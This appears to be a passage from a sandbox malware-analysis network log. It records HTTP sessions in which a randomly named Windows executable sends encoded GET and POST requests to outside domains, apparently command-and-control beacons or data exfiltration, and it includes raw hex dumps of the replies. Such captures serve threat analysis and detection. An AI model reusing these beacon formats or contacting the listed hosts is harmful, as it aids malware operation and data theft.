Aug 27, 2024 17:48:51.261888981 CEST	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Tue, 27 Aug 2024 15:48:51 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>
Aug 27, 2024 17:48:51.261898041 CEST	10312	OUT	Data Raw: 64 75 71 33 38 45 58 4b 46 71 63 67 50 65 4f 2f 78 4e 55 52 68 46 32 4e 35 7a 51 72 68 70 37 76 69 52 54 7a 58 2f 52 32 64 4a 71 46 39 43 6a 78 69 6b 49 74 67 46 4d 4e 4c 42 31 73 4c 49 44 49 57 61 4d 75 62 46 79 47 68 6f 56 2b 75 42 61 32 6b 61 Data Ascii: duq38EXKFqcgPeO/xNURhF2N5zQrhp7viRTzX/R2dJqF9CjxikItgFMNLB1sLIDIWaMubFyGhoV+uBa2kaOBzsuqwQZM5nsEBolZiswPa0sNA18CSJqziXowh1rVfjPQNdpSctOGGsnVn0ru+cAehSGP11tHwUDE8qE0rJpbi2Az6k1tMM7lgd12XKBkEvosaKlSb/ewYg1jM7IXd2w07ZSxM3fVa1gBHiMxyJUY+ydOSdrjotU
Aug 27, 2024 17:48:51.261953115 CEST	2578	OUT	Data Raw: 54 50 42 6b 64 64 43 76 74 58 56 49 65 4e 54 43 41 43 59 61 6d 50 72 34 32 7a 51 69 74 53 7a 70 79 4b 74 6c 4f 4c 49 74 77 47 78 2b 44 56 64 53 2f 4f 30 78 68 42 67 46 47 57 44 47 56 42 5a 43 6c 37 33 52 43 43 4f 37 31 6a 6f 52 56 75 42 4b 33 4c Data Ascii: TPBkddCvtXVIeNTCACYamPr42zQitSzpyKtlOLItwGx+DVdS/O0xhBgFGWDGVBZCl73RCCO71joRVuBK3LrQFajbLplLArRFBPpqB12JfaMOoprV7Jd5/V3G8x5sc5E5c5mWYfzlyHBAScme5BdhxGzLNbsyWGXcyxwwoZdPlPQp0EBu0qDPFxKwq+kr4HPzWwjXVuuCgtz5moSDWtnk9EBy3WoF4IvjrVvgqwBha0TNPOQoPoa

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.11.20	49839	172.96.191.39	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:48:53.795021057 CEST	527	OUT	GET /frol/?AvLLLbOh=YNeTF4pSv4+M6gG3KqO7busQPotc22z/OB6yhtk01jUCobC9Y52Gmw3Z99Ir4kEoVNEa+n0iDPzrnsm9kM3Fz3qyLYlg0011pg2PCcWBraIo86SjG5d0+YE=&7RB=66nPyLG8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.bola88site.one Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:48:54.125811100 CEST	1033	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 796 date: Tue, 27 Aug 2024 15:48:53 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.11.20	49840	148.135.49.178	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:49:00.533078909 CEST	812	OUT	POST /w4ze/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.policydetails.online Origin: http://www.policydetails.online Referer: http://www.policydetails.online/w4ze/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 32 68 4e 72 48 66 32 33 65 4c 33 62 69 4e 41 59 48 65 33 48 71 66 76 58 62 37 71 2b 38 30 74 6f 6e 76 6a 63 32 59 51 35 59 71 49 41 30 35 73 72 53 42 6c 75 59 63 38 71 2f 74 38 47 30 6a 31 43 44 2f 36 30 6a 72 75 39 6b 73 41 74 2f 65 58 6b 6a 70 49 57 49 6a 65 6e 7a 2b 65 43 46 35 64 30 57 67 68 4d 41 32 2f 37 46 6f 76 39 55 4c 47 78 53 31 33 32 31 6e 4a 74 48 35 55 71 79 44 59 6c 6b 31 49 61 64 41 4a 62 34 63 2f 46 36 71 4b 6b 46 4c 45 7a 39 58 51 46 65 67 52 6a 44 70 49 43 6d 4a 76 68 6b 4f 72 4c 48 39 70 4c 41 57 73 45 54 4c 73 54 49 30 61 63 45 5a 61 31 6e 66 36 6c 77 3d 3d Data Ascii: AvLLLbOh=Q2hNrHf23eL3biNAYHe3HqfvXb7q+80tonvjc2YQ5YqIA05srSBluYc8q/t8G0j1CD/60jru9ksAt/eXkjpIWIjenz+eCF5d0WghMA2/7Fov9ULGxS1321nJtH5UqyDYlk1IadAJb4c/F6qKkFLEz9XQFegRjDpICmJvhkOrLH9pLAWsETLsTI0acEZa1nf6lw==
Aug 27, 2024 17:49:01.170279980 CEST	1289	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/8.1.29 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://policydetails.online/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Tue, 27 Aug 2024 15:49:01 GMT server: LiteSpeed Data Raw: 65 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 5b fb 73 9b 48 12 fe 79 5d 75 ff 03 26 b5 36 6c 00 01 7a 4b 26 a9 6c 92 bd da ab bd cb d6 26 a9 fb 21 4e a5 10 0c 12 09 02 96 87 6d 9d a2 ff fd be 19 9e c2 e8 61 29 a9 58 11 43 77 7f 3d 3d 3d fd 98 71 6e 2e ed c0 4a 56 21 e1 16 c9 d2 e3 5e fc e3 e2 e6 52 96 3f b9 0e f7 fb 5b 6e f4 f9 05 87 3f 37 ec 95 e5 99 71 6c f0 2e 19 f1 9c 67 fa 73 83 27 3e ff 82 bb b9 fc 44 7c db 75 3e cb f2 36 f3 b8 95 79 7c 04 f3 3c c9 c1 a9 2a 40 60 f0 05 a4 fc f1 3d 43 95 e5 06 f2 82 98 36 34 60 0a 2f 49 62 72 d6 c2 8c 62 92 18 fc c7 0f bf c9 50 ba b3 f5 d6 37 97 c4 e0 ef 5c 72 1f 06 51 c2 73 56 e0 27 c4 07 f5 bd 6b 27 0b c3 26 77 ae 45 64 f6 20 71 ae ef 26 ae e9 c9 b1 65 7a c4 d0 14 95 2f 64 79 ae ff 8d 8b 88 67 f0 a1 eb cf 67 a6 f5 8d e7 16 11 71 0c 7e 91 24 e1 a4 d3 09 03 cf b5 56 36 14 72 bd 58 09 7c 30 90 ce c3 d2 8b 42 4b 09 17 61 4d ad c4 4d 3c f2 e2 4f 73 4e 38 3f 48 38 27 48 7d 9b bb 7a 36 d2 35 6d ca fd ee c7 69 64 fa 16 e1 fe 64 02 b9 37 99 c4 9b 4e c6 76 71 53 6a [TRUNCATED] Data Ascii: e93[sHy]u&6lzK&l&!Nma)XCw===qn.JV!^R?[n?7ql.gs'>D\|u>6y\|<*@`=C64`/IbrbP7\rQsV'k'&wEd q&ez/dyggq~$V6rX\|0BKaMM<OsN8?H8'H}z65midd7NvqSjrmBXLvEa0\|BWF_"~O/{{}HW=IL=n\|<~On;XWh~q[\|vmG+~%_9i@\|4?YXqLL[^j\|'t}kD@(LaK949IhI}+q_p%_\HD8gD\'Kug?8'DJ%p"{rgz)yf8IHz?JDX=Y(n`kA6>AU#F+TIlp%%E"=f}zUqJ'TtWQdun#ZA(JuNFF$I#K'Xu}J>oiaOQTWUswr[%t+`AH%"
Aug 27, 2024 17:49:01.170337915 CEST	1289	IN	Data Raw: 1c a7 07 8a 59 4f c5 a7 35 80 4e e5 77 bd f6 bd 5f fb 4e 6a df 6b f4 43 a7 0e cf c4 e6 f0 35 e1 8d 11 40 34 46 00 d4 18 01 5c 63 04 a0 db 23 80 16 a7 6c 09 f2 e8 90 ad 41 6d a6 b0 b8 6d e9 03 c6 48 ad 3f d3 66 85 b6 f5 57 d4 e2 f4 95 b8 c9 25 68 Data Ascii: YO5Nw_NjkC5@4F\c#lAmmH?fW%h;M<=ql8p7fBruA:~G.h#yI \|fTUqFx%g;%6\|M 6,y[M.(`W)hAKu{!mBA
Aug 27, 2024 17:49:01.170388937 CEST	1289	IN	Data Raw: bd 09 d7 ed f4 0e 10 e9 94 48 df 4b a4 53 38 fd 00 9c 36 90 c7 d0 7b d0 19 ef 95 35 96 b5 c1 84 1b 77 b4 41 83 8c d9 5e 86 7b 61 cf 4e b8 67 2a fb d3 4e 63 ad 4c 1f 84 a9 1b 2f e4 39 da 6d 90 9b b3 d9 c8 6a da 23 17 79 bf 70 13 98 94 fa 27 75 d1 Data Ascii: HKS86{5wA^{aNgNcL/9mj#yp'um4!NdwQhg8a;{8 A@yf9:I;NX<a0VxLZRunz,/U@>)EV[5}nT5'N]cM2M4=x<ki,"7K2deFu6K/
Aug 27, 2024 17:49:01.170465946 CEST	279	IN	Data Raw: 39 21 66 9d 80 f2 f4 58 75 02 c8 53 63 d4 c9 10 3b 63 53 43 83 ea 98 3a 2f fe ca f3 fd 2a 3e d6 ea a9 b6 e8 52 72 1c ba 8c 68 f3 fb 86 0b 55 ea 54 29 aa bc bb a8 55 15 47 ab 74 cc 25 45 9b 5e 4f b9 5d 38 4f c1 a7 20 1d d6 b4 e5 f2 e1 47 aa d7 22 Data Ascii: 9!fXuSc;cSC:/*>RrhUT)UGt%E^O]8O G"E#$R-Z^UGg>jx2$ `l-78"}CcDvp@"/8Ab-avqy4oc`?\XS
Aug 27, 2024 17:49:01.177611113 CEST	1289	IN	Data Raw: 61 62 39 0d 0a cc 5c fb 73 db 36 12 fe 39 99 b9 ff 01 61 67 22 fb 5a 8a 92 e3 c4 4e 22 39 d3 ba 49 27 37 79 78 ea dc b5 37 cd 0d 87 12 29 99 ae 24 aa 7c f8 31 bd fc ef f7 ed 02 20 41 12 7a d9 9d 5e f5 83 2d 42 78 2c 76 17 8b 05 b8 df ae 89 0a cb Data Ascii: ab9\s69ag"ZN"9I'7yx7)$\|1 Az^-Bx,vCw9+"5I;D!0[#]1armL$a<v;J2;U$q,JZ&O{&G{NLQm[7y2BX?;I)^^dfH"d+(
Aug 27, 2024 17:49:01.177710056 CEST	1289	IN	Data Raw: e0 b8 c8 f2 64 2e 70 ec 83 c7 5c fa db 54 1f 9e ee f7 f1 95 38 55 67 74 02 15 92 ea 54 80 b7 87 0f 2a 68 21 bc f5 6b 3a 9a e2 46 23 18 47 17 c9 0c de ba 73 b2 6b ff 1a 4b 37 f0 54 3e 1b 24 e4 e1 d8 42 95 7e 27 4a d3 24 3d ec 1d 62 95 00 44 05 87 Data Ascii: d.p\T8UgtT*h!k:F#GskK7T>$B~'J$=bD)Hqig8t IE1WUfvQGvo:~FnPBlK7c<UPf!bG$f5{$GJd1$/.n9ke?:I#j]K9185/zD!uR)@6Aq
Aug 27, 2024 17:49:01.177721977 CEST	174	IN	Data Raw: ef 2a fa 6e 46 d7 2c b7 2c 58 69 73 0a 60 4a 5b 42 5b ee 35 d4 f7 1d b6 1b 73 f8 35 9b 8e f6 12 c0 f7 bb 6f 3d 74 0d d0 16 82 4d 13 94 05 3d d3 d7 95 b8 c5 c4 3b 88 f4 56 b3 b7 d6 8b bd d0 d6 2d 26 7b 2f 8b 8e c4 b9 44 46 5d bb ac c3 b3 34 6a 24 Data Ascii: *nF,,Xis`J[B[5s5o=tM=;V-&{/DF]4j$wm"h4tt\|K&UF},Lj7mr(G_sdo)z3h
Aug 27, 2024 17:49:01.192244053 CEST	1289	IN	Data Raw: 36 61 61 0d 0a ec 5d 59 73 e2 46 10 7e f6 bf 98 f2 d3 a6 12 85 43 ac 40 ae 0a 55 6c 96 b5 9d 90 e0 b2 58 fb 71 0b 2f 32 d8 88 a3 0c 2c e4 df e7 eb 9e 43 07 b2 30 96 d8 e2 01 1e 8c b0 46 3d 87 a6 e7 eb 6b 7a 74 d9 e8 6f 79 4d 77 12 e2 cf 02 09 7c Data Ascii: 6aa]YsF~C@UlXq/2,C0F=kztoyMw\|"YPM13`pY(PLLZ41x$!"K"YQpHj[pNda:YTRz`1yLI?JIPA=d)lq .PexQUkd.r 3,
Aug 27, 2024 17:49:01.192264080 CEST	424	IN	Data Raw: 69 de 1f e0 84 ab a9 85 dd 0d 63 c4 0a 4c 9e 36 7b 2b 20 1d aa 43 74 a8 0e 03 21 9f 54 5d a2 83 ba c4 87 90 13 28 34 46 b4 b8 4e f1 05 75 8a 5b aa f3 97 6c 9c b1 0f 82 33 f5 c2 70 86 29 e5 c6 99 3a e3 0c 0e 72 e3 d5 37 af 8a 52 57 38 23 d7 f2 bc Data Ascii: icL6{+ Ct!T](4FNu[l3p):r7RW8#8S#8O}5Z~)f5 fTNxaj[`SB\A8^VV{#]>/^Y-lod-kET-jN"<YK6zP)FFPg3ETn.4*p~;g
Aug 27, 2024 17:49:01.198611021 CEST	989	IN	Data Raw: 33 64 36 0d 0a ed 5d 5d 6f d3 30 14 7d e7 57 64 91 86 40 62 84 56 d0 31 56 2a 05 2a 04 52 59 25 58 e1 61 9d 50 9a 34 30 d4 0f 94 50 a6 3e f0 df 39 d7 d7 9f 49 d6 76 a4 9d 40 ea 1e 96 b4 76 7c dd c4 f6 b5 9d 73 ce fd 3f de 6d d1 ca 6c 46 31 62 af Data Ascii: 3d6]]o0}Wd@bV1V**RY%XaP40P>9Iv@v\|s?mlF1b#lXS@a-G'_XB^'yk<>(B6$OFc{'t\|OX1h`Oj:xVsen5s(v1v14r\|[x[VoY7S33l3$
Aug 27, 2024 17:49:01.198625088 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.11.20	49841	148.135.49.178	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:49:03.237301111 CEST	1152	OUT	POST /w4ze/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.policydetails.online Origin: http://www.policydetails.online Referer: http://www.policydetails.online/w4ze/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 32 68 4e 72 48 66 32 33 65 4c 33 5a 43 52 41 61 6c 32 33 57 36 66 73 4c 4c 37 71 33 63 31 71 6f 6e 72 6a 63 30 30 36 35 4e 79 49 48 52 46 73 71 58 74 6c 76 59 63 38 68 66 74 6c 43 30 6a 36 43 44 36 48 30 6e 72 75 39 6e 51 41 73 4e 57 58 31 44 70 58 4f 34 6a 64 78 44 2b 66 47 46 35 4c 30 57 74 41 4d 45 6d 2f 37 56 55 76 36 57 7a 47 32 44 31 77 78 56 6e 50 76 48 35 58 68 53 43 62 6c 6b 35 32 61 64 6f 7a 62 4f 73 2f 45 62 4b 4b 6c 46 4c 46 38 39 58 58 4a 2b 67 46 6c 44 77 65 4e 79 70 54 78 69 57 32 46 56 59 54 42 69 47 78 64 44 6a 65 45 4b 39 6e 45 31 63 30 2b 6b 69 6d 79 50 69 58 6e 69 70 61 52 79 43 37 67 4e 2b 74 31 54 51 7a 50 38 78 47 78 33 56 44 59 2b 50 55 63 4e 61 7a 55 30 55 37 2f 56 45 69 48 43 56 75 6b 46 68 61 5a 36 41 55 59 64 48 2b 51 69 55 6d 59 2b 35 2b 50 76 44 6e 58 6d 72 71 38 4c 37 76 50 35 77 52 34 58 63 34 79 33 61 44 32 45 72 4c 4e 64 76 72 48 46 6f 43 4e 57 41 62 76 53 6b 64 4d 66 4f 44 71 6d 62 52 68 77 70 62 65 78 67 57 48 57 65 6b 76 57 68 62 34 [TRUNCATED] Data Ascii: AvLLLbOh=Q2hNrHf23eL3ZCRAal23W6fsLL7q3c1qonrjc0065NyIHRFsqXtlvYc8hftlC0j6CD6H0nru9nQAsNWX1DpXO4jdxD+fGF5L0WtAMEm/7VUv6WzG2D1wxVnPvH5XhSCblk52adozbOs/EbKKlFLF89XXJ+gFlDweNypTxiW2FVYTBiGxdDjeEK9nE1c0+kimyPiXnipaRyC7gN+t1TQzP8xGx3VDY+PUcNazU0U7/VEiHCVukFhaZ6AUYdH+QiUmY+5+PvDnXmrq8L7vP5wR4Xc4y3aD2ErLNdvrHFoCNWAbvSkdMfODqmbRhwpbexgWHWekvWhb4O02DyDS5ZBrppXvzkwbG2Ft0RbYGCuSq75ZeFfFgE9g4mw/nznrcD9Vfo/zpYk6yaLTnJy1r+tpy06LlGnTwbndTEhQLEgXO6JQgarEYbCWt8Uzq5r3zJtwU61+lUbrcMHypoy4TDCFzDSLxzLkkzFNDifkA4Rj9l07E4UlKEJEKF/PylvyOiaXRm42KVvmdhdBHbVddeKFcDw=
Aug 27, 2024 17:49:05.427855968 CEST	1289	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/8.1.29 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://policydetails.online/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Tue, 27 Aug 2024 15:49:05 GMT server: LiteSpeed Data Raw: 65 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 5b fb 73 9b 48 12 fe 79 5d 75 ff 03 26 b5 36 6c 00 01 7a 4b 26 a9 6c 92 bd da ab bd cb d6 26 a9 fb 21 4e a5 10 0c 12 09 02 96 87 6d 9d a2 ff fd be 19 9e c2 e8 61 29 a9 58 11 43 77 7f 3d 3d 3d fd 98 71 6e 2e ed c0 4a 56 21 e1 16 c9 d2 e3 5e fc e3 e2 e6 52 96 3f b9 0e f7 fb 5b 6e f4 f9 05 87 3f 37 ec 95 e5 99 71 6c f0 2e 19 f1 9c 67 fa 73 83 27 3e ff 82 bb b9 fc 44 7c db 75 3e cb f2 36 f3 b8 95 79 7c 04 f3 3c c9 c1 a9 2a 40 60 f0 05 a4 fc f1 3d 43 95 e5 06 f2 82 98 36 34 60 0a 2f 49 62 72 d6 c2 8c 62 92 18 fc c7 0f bf c9 50 ba b3 f5 d6 37 97 c4 e0 ef 5c 72 1f 06 51 c2 73 56 e0 27 c4 07 f5 bd 6b 27 0b c3 26 77 ae 45 64 f6 20 71 ae ef 26 ae e9 c9 b1 65 7a c4 d0 14 95 2f 64 79 ae ff 8d 8b 88 67 f0 a1 eb cf 67 a6 f5 8d e7 16 11 71 0c 7e 91 24 e1 a4 d3 09 03 cf b5 56 36 14 72 bd 58 09 7c 30 90 ce c3 d2 8b 42 4b 09 17 61 4d ad c4 4d 3c f2 e2 4f 73 4e 38 3f 48 38 27 48 7d 9b bb 7a 36 d2 35 6d ca fd ee c7 69 64 fa 16 e1 fe 64 02 b9 37 99 c4 9b 4e c6 76 71 53 6a [TRUNCATED] Data Ascii: e93[sHy]u&6lzK&l&!Nma)XCw===qn.JV!^R?[n?7ql.gs'>D\|u>6y\|<*@`=C64`/IbrbP7\rQsV'k'&wEd q&ez/dyggq~$V6rX\|0BKaMM<OsN8?H8'H}z65midd7NvqSjrmBXLvEa0\|BWF_"~O/{{}HW=IL=n\|<~On;XWh~q[\|vmG+~%_9i@\|4?YXqLL[^j\|'t}kD@(LaK949IhI}+q_p%_\HD8gD\'Kug?8'DJ%p"{rgz)yf8IHz?JDX=Y(n`kA6>AU#F+TIlp%%E"=f}zUqJ'TtWQdun#ZA(JuNFF$I#K'Xu}J>oiaOQTWUswr[%t+`AH%"
Aug 27, 2024 17:49:05.427947998 CEST	1289	IN	Data Raw: 1c a7 07 8a 59 4f c5 a7 35 80 4e e5 77 bd f6 bd 5f fb 4e 6a df 6b f4 43 a7 0e cf c4 e6 f0 35 e1 8d 11 40 34 46 00 d4 18 01 5c 63 04 a0 db 23 80 16 a7 6c 09 f2 e8 90 ad 41 6d a6 b0 b8 6d e9 03 c6 48 ad 3f d3 66 85 b6 f5 57 d4 e2 f4 95 b8 c9 25 68 Data Ascii: YO5Nw_NjkC5@4F\c#lAmmH?fW%h;M<=ql8p7fBruA:~G.h#yI \|fTUqFx%g;%6\|M 6,y[M.(`W)hAKu{!mBA
Aug 27, 2024 17:49:05.428075075 CEST	1289	IN	Data Raw: bd 09 d7 ed f4 0e 10 e9 94 48 df 4b a4 53 38 fd 00 9c 36 90 c7 d0 7b d0 19 ef 95 35 96 b5 c1 84 1b 77 b4 41 83 8c d9 5e 86 7b 61 cf 4e b8 67 2a fb d3 4e 63 ad 4c 1f 84 a9 1b 2f e4 39 da 6d 90 9b b3 d9 c8 6a da 23 17 79 bf 70 13 98 94 fa 27 75 d1 Data Ascii: HKS86{5wA^{aNgNcL/9mj#yp'um4!NdwQhg8a;{8 A@yf9:I;NX<a0VxLZRunz,/U@>)EV[5}nT5'N]cM2M4=x<ki,"7K2deFu6K/
Aug 27, 2024 17:49:05.428087950 CEST	279	IN	Data Raw: 39 21 66 9d 80 f2 f4 58 75 02 c8 53 63 d4 c9 10 3b 63 53 43 83 ea 98 3a 2f fe ca f3 fd 2a 3e d6 ea a9 b6 e8 52 72 1c ba 8c 68 f3 fb 86 0b 55 ea 54 29 aa bc bb a8 55 15 47 ab 74 cc 25 45 9b 5e 4f b9 5d 38 4f c1 a7 20 1d d6 b4 e5 f2 e1 47 aa d7 22 Data Ascii: 9!fXuSc;cSC:/*>RrhUT)UGt%E^O]8O G"E#$R-Z^UGg>jx2$ `l-78"}CcDvp@"/8Ab-avqy4oc`?\XS
Aug 27, 2024 17:49:05.429672956 CEST	1289	IN	Data Raw: 61 62 62 0d 0a cc 5c fb 73 db 36 12 fe 39 99 b9 ff 01 61 67 22 fb 5a 8a 92 e3 c4 4e 22 39 d3 ba 49 27 37 79 78 ea dc b5 37 cd 0d 87 12 29 99 ae 24 aa 7c f8 31 bd fc ef f7 ed 02 20 41 12 7a d9 9d 5e f5 83 2d 42 78 2c 76 17 8b 05 b8 df ae 89 0a cb Data Ascii: abb\s69ag"ZN"9I'7yx7)$\|1 Az^-Bx,vCw9+"5I;D!0[#]1armL$a<v;J2;U$q,JZ&O{&G{NLQm[7y2BX?;I)^^dfH"d+(
Aug 27, 2024 17:49:05.429780960 CEST	1289	IN	Data Raw: e0 b8 c8 f2 64 2e 70 ec 83 c7 5c fa db 54 1f 9e ee f7 f1 95 38 55 67 74 02 15 92 ea 54 80 b7 87 0f 2a 68 21 bc f5 6b 3a 9a e2 46 23 18 47 17 c9 0c de ba 73 b2 6b ff 1a 4b 37 f0 54 3e 1b 24 e4 e1 d8 42 95 7e 27 4a d3 24 3d ec 1d 62 95 00 44 05 87 Data Ascii: d.p\T8UgtT*h!k:F#GskK7T>$B~'J$=bD)Hqig8t IE1WUfvQGvo:~FnPBlK7c<UPf!bG$f5{$GJd1$/.n9ke?:I#j]K9185/zD!uR)@6Aq
Aug 27, 2024 17:49:05.429887056 CEST	176	IN	Data Raw: d5 65 f5 5d 45 df cd e8 9a e5 96 05 2b 6d 4e 01 4c 69 4b 68 cb bd 86 fa be c3 76 63 0e bf 66 d3 d1 5e 02 f8 7e f7 ad 87 ae 01 da 42 b0 69 82 b2 a0 67 fa ba 12 b7 98 78 07 91 de 6a f6 d6 7a b1 17 da ba c5 64 ef 65 d1 91 38 97 c8 a8 6b 97 75 78 96 Data Ascii: e]E+mNLiKhvcf^~Bigxjzde8kuxFMnoiv^yESiCU-M^T=3Ryl "CC\o~pP
